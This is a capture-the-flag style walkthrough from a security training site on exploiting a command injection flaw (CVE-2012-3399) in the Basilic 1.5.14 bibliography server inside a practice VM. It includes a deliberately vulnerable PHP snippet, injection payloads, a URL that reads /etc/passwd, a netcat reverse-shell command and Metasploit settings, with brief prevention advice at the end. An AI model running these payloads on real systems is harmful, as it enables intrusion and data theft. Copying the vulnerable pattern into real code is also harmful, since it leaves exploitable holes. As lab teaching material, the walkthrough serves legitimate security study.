Pentester Academy Command Injection ISO: Basilic 1.5.14 exploitation
The Pentester Academy has just recently launched a Command Injection ISO virtual image of Ubuntu. This image has 10 real-world applications which have a vulnerable application framework. Remote code execution is possible by exploiting each of the installed application. It is important to note that this application is not running entirely on port 80.
Refer to the following links for related downloads and pertinent information:
What should you learn next?
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12
What is Command Injection?
Command injection is an attack where the Cyberattacker tries to pass malicious payloads which are improperly handled by the application and then subsequently executed on the system shell. This vulnerability leads to remote code execution on the host machine where the vulnerable application resides on.
Command injection runs with the same privilege as that of the application. For example, if the vulnerable application is executed with the privilege of www-data, and if it is later exploited, then the Cyber attacker will get root privileges associated with the www-data.
The main reason for command injection vulnerability is the lack of input validation and system call or system methods that are used in the source code itself.
This is illustrated with a sample of vulnerable code for launching a command injection:
Create a file "test.txt" and write "Command injection test" in that file and save it as "read.php."
<?php
print ("Command Injection testing")
print("<p>");
$file=$_GET['fileread'];
system("cat $file");
?>
To read a file, we must send a "GET" request to the server with the parameter "fileread" in the URL as described below:
http://localhost/read.php?fileread=abc.txt
The output will be as follows:
Command Injection testing
Command injection text
To exploit the command injection vulnerability in the above code, we need to send the following request to the server:
http://localhost/read.php?fileread=abc.txt;id
The output will be:
Command Injection testing
Command injection text
Uid=33 (www-data) gid=33(www-data) groups=33(www-data)
The attacker then executes a command with the same privilege which is the same of the application which is currently running. This is how the command injection vulnerability is then executed.
There are other variants of executing "id" on the vulnerable application, and they are as follows:
http://localhost/read.php?fileread=abc.txt || id
http://localhost/read.php?fileread=abc.txt && id
If the installed application runs with root privilege, then the command injection can execute any command on the vulnerable host machine that the root user can execute.
Lab setup required for command injection pentest:
- Kali Linux (Bridged or NAT). Attacker Kali Linux IP is 192.168.1.102
- Command Injection ISO (Bridged or NAT). Target IP is 192.168.1.103
Understanding the look and feel of command injection ISO:
Command injection ISO provides us the facility to login into the OS and get a close look at the vulnerable application. To do this, log in to the command injection ISO with the username as "securitytube" and password as "123321".
Checking out for port 80 on Command Injection ISO (192.168.1.103)
As seen above there are many frameworks installed for exploitation. We will be working with Basilic 1.5.14 in this article.
What is Basilic?
Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options.
Basilic requires PHP, Apache, and MySQL for the proper installation and configuration.
To download, configure and install basilic click on the below link: http://artis.imag.fr/Software/Basilic/
Now click on the basilic folder, and you will see the following screen:
Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL:
http://www.securityfocus.com/bid/54234/exploit
The exploit URL provides the vulnerable URL that leads to the Remote Code Execution.
The exploit helps to determine that the "diff.php" file is vulnerable to input handling and it is present in the /basilica/Config directory:
http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
Due to the output encoding of SecurityFocus, it seems to be obfuscated. An actual exploit can be seen at this link:
http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
Using the exploit mentioned above for command execution., the following screen thus appears:
We can execute a system command using a file parameter to get a reverse shell which is as follows:
Start a listener on Kali
root@kali#nc -lvvp 3333
Enter the command in file parameter as "diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2"
Got the Shell.
The vulnerability of the Metasploit and Kali can now be exploited which is as follows:
Searching for an exploit in exploit-db with searchsploit tool in Kali Ruby exploit gives the following screen:
If the language is ruby, then it will also be present in Metasploit which can be described as follows:
Searching for an exploit in the MSF framework.
root@kali# service postgresql start
root@kali# service metasploit start
root@kali# msfconsole
msf> search basilic
The above screen shows an Arbitrary Command Execution exploit for Basilic.
Now, configure and run Metasploit as shown below:
Module options
RHOST 192.168.1.103
RPORT 80
TARGETURL /basilic-1.5.14/
Payload options
LHOST 192.168.1.102
LPORT 4444
Finally, Exploit.
We have thus successfully exploited a command injection vulnerability in basilic and got the www-data privilege on the target.
How to prevent command injection:
- The developer should implement proper input validation; special characters should not be used throughout the entire application.
- The system call function should not be used anywhere in the backend programming.
- The software application should run with least privilege.
References:
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3399
http://www.securityfocus.com/bid/54234
https://www.owasp.org/index.php/Command_Injection
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
Enroll in an Ethical Hacking Boot Camp and earn two of the industry’s most respected certifications — guaranteed.
- CEH exam voucher
- PenTest+ exam voucher
- Exam Pass Guarantee
- Live online hacking training
In this Series
- Pentester Academy Command Injection ISO: Basilic 1.5.14 exploitation
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness